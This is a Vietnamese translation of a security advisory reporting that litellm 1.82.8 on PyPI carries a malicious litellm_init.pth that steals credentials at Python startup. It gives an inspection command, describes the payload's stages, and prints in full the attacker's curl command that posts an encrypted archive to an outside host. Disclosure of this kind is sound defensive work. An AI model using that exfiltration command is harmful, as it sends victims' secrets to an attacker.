Skip to content
tinAI
Go back

[Bảo Mật]: NGHIÊM TRỌNG: litellm_init.pth độc hại trong litellm 1.82.8 — đánh cắp thông tin đăng nhập

Bài gốc: [Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 — credential stealer

Tác giả: Unknown

Ngày đăng: Dịch ngày:

TL;DR

Phiên bản litellm 1.82.8 trên PyPI bị phát hiện có chứa file .pth độc hại tự động chạy mã đánh cắp thông tin đăng nhập. Người dùng đã cài đặt cần xóa phiên bản này và cập nhật thông tin bảo mật ngay lập tức.

Tổng quan

Package litellm==1.82.8 trên PyPI chứa một file .pth độc hại (litellm_init.pth) tự động thực thi script đánh cắp thông tin mỗi khi Python được khởi động, ngay cả khi không sử dụng import litellm.

Cách tái tạo vấn đề

pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
    pth = [n for n in z.namelist() if n.endswith('.pth')]
    print('PTH files:', pth)
    for p in pth:
        print(z.read(p)[:300])"

Phân tích hành vi độc hại

Script này mã hóa hai lần bằng base64. Khi giải mã, nó thực hiện:

Giai đoạn 1: Thu thập thông tin

Giai đoạn 2: Mã hóa và gửi dữ liệu đi

  1. Ghi dữ liệu vào file tạm
  2. Mã hóa dữ liệu với openssl enc -aes-256-cbc
  3. Khóa AES được mã hóa qua RSA công khai
  4. Đóng thành tpcp.tar.gz và gửi đi qua:
curl -s -o /dev/null -X POST \
  "https://models.litellm.cloud/" \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @tpcp.tar.gz

Chi tiết kỹ thuật

Tác động

Người dùng cài đặt litellm==1.82.8 đã bị mất thông tin bảo mật.

Phiên bản Ảnh hưởng

Hành động đề xuất

  1. PyPI: Xóa bản litellm 1.82.8 ngay lập tức
  2. Người dùng: Xoá litellm_init.pth khỏi thư mục site-packages/

Môi trường

Hãy thực hiện thay đổi để bảo vệ hệ thống của bạn.


Read Original (EN) Quay lại Newsletter